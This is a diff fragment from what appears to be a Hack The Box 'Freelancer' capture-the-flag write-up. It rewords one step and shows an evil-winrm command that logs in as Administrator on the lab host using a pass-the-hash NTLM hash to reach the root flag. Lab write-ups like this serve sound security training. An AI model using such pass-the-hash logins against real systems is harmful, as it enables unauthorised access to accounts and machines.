K-Scorpio/scorpiosec/content/en/posts/HTB-Freelancer.md

 ![Kerberos ticket](/images/HTB-Freelancer/hashes_list.png)

-6. We can now login with the Administrator hash using evil-winrm and the root flag is on the Desktop.
+6. Finally, we login with the Administrator hash using evil-winrm and the root flag is on the Desktop.

 ```
 evil-winrm -i freelancer.htb -u administrator -H '0039318f1e8274633445bce32ad1a290'